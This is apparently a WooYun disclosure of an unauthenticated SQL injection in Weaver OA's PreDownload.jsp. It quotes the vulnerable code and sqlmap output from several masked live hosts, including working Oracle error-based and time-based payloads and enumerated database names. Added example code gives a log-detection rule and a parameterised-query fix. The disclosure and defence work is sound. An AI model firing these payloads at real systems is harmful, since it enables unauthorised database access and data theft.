SQL injection vulnerability in the Weaver (泛微) OA general-purpose system (reproducible on the vendor's own site, no login required)

2015-12-10 05:45

The problem is in the file PreDownload.jsp under mobile\plugin, which contains:

Code:
    String url = StringHelper.null2String(request.getParameter("url"));
    String sessionkey = StringHelper.null2String(request.getParameter("sessionkey"));
    MpluginServiceImpl pluginService = (MpluginServiceImpl)BaseContext.getBean("mpluginServiceImpl");
    if(pluginService.verify(sessionkey)) {
        String filepath = "";
        String iszip = "";
        String filename = "";
        String hashcode = "";
        if (!StringHelper.isEmpty(url)) {
            DataService ds = new DataService();
            // the raw "url" request parameter is concatenated straight into the query text
            String sql = "select objname,filetype,filedir,iszip from attach where id = '"
                + url+"'";
            Map dataMap = ds.getValuesForMap(sql);
            if (!dataMap.isEmpty()) {
                filepath = StringHelper.null2String(dataMap.get("filedir"));
                iszip = StringHelper.null2String(dataMap.get("iszip"));
                filename = StringHelper.null2String(dataMap.get("objname"));
            } else {
                filepath = request.getRealPath(url);
            }
        } else {
            filepath = request.getRealPath(url);
            iszip = "0";
            filename = filepath.substring(filepath.lastIndexOf("/")+1);
        }
        // remainder of the file is not included in the report





The url parameter is not filtered at all here, so it can lead to SQL injection.



We first take the vendor's official site as the example:

http://**.**.**.**:9085/mobile/plugin/PreDownload.jsp?url=1

[screenshot: 选区_298.png]

[screenshot: 选区_299.png]







Running sqlmap directly:

Output:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: url (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: url=1' AND 5516=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (5516=5516) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(98)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'DXjL'='DXjL

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: url=1' AND 7465=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(71)||CHR(103)||CHR(119),5) AND 'iLzy'='iLzy
---





Databases:

Output:
available databases [37]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EWEAVER
[*] EWEAVER5TEST
[*] EWEAVERINHOUSE
[*] EWEAVERTEST
[*] EXFSYS
[*] FTOA01
[*] FTPOM
[*] HR
[*] HTF
[*] IX
[*] MDSYS
[*] MOBILEDEMO
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] PMECOLOGY
[*] POWER
[*] POWER01
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEAVERIM
[*] WFPM
[*] WMSYS
[*] XDB
[*] ZTDBA
[*] ZTKG
[*] ZZB
[*] ZZBMIS3





This matches the list in http://**.**.**.**/bugs/wooyun-2015-0124589.





Proof of vulnerability:

A few more cases:

http://**.**.**.**/mobile/plugin/PreDownload.jsp?url=1



Output:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: url (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: url=1' AND 9725=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (9725=9725) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'byuN'='byuN

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: url=1' AND 8995=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(68)||CHR(105)||CHR(97),5) AND 'TiYk'='TiYk
---
[22:57:56] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle





Databases:

Output:
available databases [21]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OAWEIFU
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WEIFU
[*] WMSYS
[*] XDB







http://**.**.**.**//mobile/plugin/PreDownload.jsp?url=1

Output:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: url (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: url=1' AND 3519=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (3519=3519) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(118)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'qKYb'='qKYb

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: url=1' AND 8926=DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(99)||CHR(78)||CHR(71),5) AND 'ejvi'='ejvi
---





Databases:

Output:
available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB







http://10.0.0.*/mobile/plugin/PreDownload.jsp?url=1

Output:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: url (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: url=1' AND 2035=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(120)||CHR(106)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2035=2035) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)) AND 'NyZn'='NyZn

Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: url=1' OR 9575=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(80)||CHR(117)||CHR(108),5) AND 'rioo'='rioo
---



Databases:

Output:
available databases [19]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB







http://**.**.**.**/mobile/plugin/PreDownload.jsp?url=1

Output:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: url (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: url=1' AND 9799=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (9799=9799) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'VxQf'='VxQf

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: url=1' AND 8957=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(66)||CHR(69)||CHR(74),5) AND 'lkVv'='lkVv
---
[23:18:02] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle







Databases:

Output:
available databases [28]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EWEAVER
[*] EWEAVERTEST
[*] EWEAVERTEST1
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] MOBILE40
[*] MOBILE41
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB









http://**.**.**.**//mobile/plugin/PreDownload.jsp?url=1%27

[screenshot: 选区_301.png]
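For operators who run this product, the probes above leave a recognisable trace: every one of them is a request to /mobile/plugin/PreDownload.jsp whose url value carries a quote and, in the later stages, Oracle functions such as XMLType, UTL_INADDR or DBMS_PIPE.RECEIVE_MESSAGE. The following checker is an added example for this page, not code from the report or from Weaver; it assumes Apache/Nginx combined-format access logs, and the sample lines in main() are constructed for the example.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Flags access-log entries for PreDownload.jsp whose url parameter carries
 * SQL-injection markers. Example code, not part of the report or of Weaver OA.
 * Assumes combined-format access logs; the sample lines below are constructed.
 */
public final class PreDownloadLogCheck {

    // Method, path and optional query string of the quoted request line.
    private static final Pattern REQUEST =
        Pattern.compile("\"(?:GET|POST) (/[^ ?\"]*)(?:\\?([^ \"]*))? HTTP/");

    // Markers taken from the probes in the report: a stray quote, plus the Oracle
    // functions the error-based and time-based payloads rely on.
    private static final Pattern MARKERS = Pattern.compile(
        "(?i)'|XMLType\\(|DBMS_PIPE\\.RECEIVE_MESSAGE|UTL_INADDR\\.|CHR\\(");

    private PreDownloadLogCheck() {}

    /** Decoded value of the url query parameter, or null when it is absent. */
    static String urlParam(String query) {
        if (query == null) return null;
        for (String pair : query.split("&")) {
            int eq = pair.indexOf('=');
            String key = eq < 0 ? pair : pair.substring(0, eq);
            if (!key.equals("url")) continue;
            String raw = eq < 0 ? "" : pair.substring(eq + 1);
            try {
                return URLDecoder.decode(raw, StandardCharsets.UTF_8);
            } catch (IllegalArgumentException malformed) {
                return raw;   // broken %-escape: inspect the raw text instead of dropping the line
            }
        }
        return null;
    }

    /** True when the entry targets PreDownload.jsp and its url value looks like a probe. */
    public static boolean isSuspicious(String logLine) {
        Matcher m = REQUEST.matcher(logLine);
        if (!m.find() || !m.group(1).endsWith("/mobile/plugin/PreDownload.jsp")) return false;
        String url = urlParam(m.group(2));
        return url != null && MARKERS.matcher(url).find();
    }

    /** Returns the subset of lines that isSuspicious() flags, in input order. */
    public static List<String> suspicious(List<String> lines) {
        List<String> hits = new ArrayList<>();
        for (String line : lines) {
            if (isSuspicious(line)) hits.add(line);
        }
        return hits;
    }

    public static void main(String[] args) {
        List<String> sample = List.of(
            // constructed: an ordinary download request
            "10.0.0.7 - - [10/Dec/2015:22:57:01 +0800] \"GET /mobile/plugin/PreDownload.jsp?url=1 HTTP/1.1\" 200 512",
            // constructed: the shape of a time-based probe, URL-encoded as a client sends it
            "10.0.0.7 - - [10/Dec/2015:22:57:56 +0800] \"GET /mobile/plugin/PreDownload.jsp?url=1%27%20AND%207465%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%2C5%29 HTTP/1.1\" 200 512",
            // constructed: the bare-quote check shown in the report
            "10.0.0.7 - - [10/Dec/2015:22:58:03 +0800] \"GET /mobile/plugin/PreDownload.jsp?url=1%27 HTTP/1.1\" 500 1024",
            // constructed: a quote sent to an unrelated page is outside this rule's scope
            "10.0.0.7 - - [10/Dec/2015:22:58:10 +0800] \"GET /login/Login.jsp?x=1%27 HTTP/1.1\" 200 300");
        for (String hit : suspicious(sample)) {
            System.out.println("SUSPICIOUS: " + hit);
        }
    }
}
```

The rule deliberately decodes the parameter before matching, since the quote arrives as %27 on the wire, and it scopes itself to the vulnerable path so that quotes in unrelated parameters do not generate noise. Of the four constructed lines, only the PreDownload.jsp requests whose url value contains a quote are reported; a 500 response on such a request, as in the third line, is the same symptom the report's last screenshot captures.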















Fix:
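The report leaves the fix section empty. The root cause is the concatenation "... where id = '" + url + "'", so the remedy is to pass url as a bind parameter rather than as query text. The class below is an added example written for this page, not Weaver's code: it uses plain JDBC with a PreparedStatement in place of DataService.getValuesForMap, assumes the caller supplies a Connection from the application's own pool, and the numeric-id allow-list check is an assumption about the attach table's schema.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.HashMap;
import java.util.Map;

/**
 * Hardened attach lookup for PreDownload.jsp (example code, not Weaver's).
 * The vulnerable line builds the SQL text by concatenating the url parameter,
 * so a quote in that parameter rewrites the statement. Here the statement text
 * is a constant and the value travels as a JDBC bind parameter, so nothing in
 * the parameter can alter the query's structure.
 */
public final class AttachLookup {

    private static final String SQL =
        "select objname, filetype, filedir, iszip from attach where id = ?";

    private AttachLookup() {}

    /**
     * Returns the four columns for the attach row with the given id, or an
     * empty map when no row matches (same contract as the original code's
     * dataMap.isEmpty() check). Obtaining the Connection from the
     * application's pool is assumed to happen in the caller.
     */
    public static Map<String, String> findAttach(Connection conn, String id) throws SQLException {
        Map<String, String> row = new HashMap<>();
        try (PreparedStatement ps = conn.prepareStatement(SQL)) {
            ps.setString(1, id);   // bound by the driver, never spliced into the SQL text
            try (ResultSet rs = ps.executeQuery()) {
                if (rs.next()) {
                    for (String col : new String[] {"objname", "filetype", "filedir", "iszip"}) {
                        String v = rs.getString(col);
                        row.put(col, v == null ? "" : v);   // mirrors StringHelper.null2String
                    }
                }
            }
        }
        return row;
    }

    /**
     * Optional allow-list check to run before the query. It assumes attach ids
     * are plain integers (an assumption about the schema; adjust if ids are not).
     * Rejecting anything else up front keeps malformed values such as 1' away
     * from the database tier entirely and gives a clean 400 instead of a 500.
     */
    public static boolean isWellFormedAttachId(String id) {
        return id != null
            && !id.isEmpty()
            && id.length() <= 18
            && id.chars().allMatch(Character::isDigit);
    }
}
```

In PreDownload.jsp the call ds.getValuesForMap(sql) would become AttachLookup.findAttach(conn, url), guarded by isWellFormedAttachId(url) where the schema allows it. Parameterisation covers only the query: the branches that hand url to request.getRealPath are untouched by this change and need their own validation of what the caller may name.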

Source: www.wooyun.org/bugs/wooyun-2015-0138725
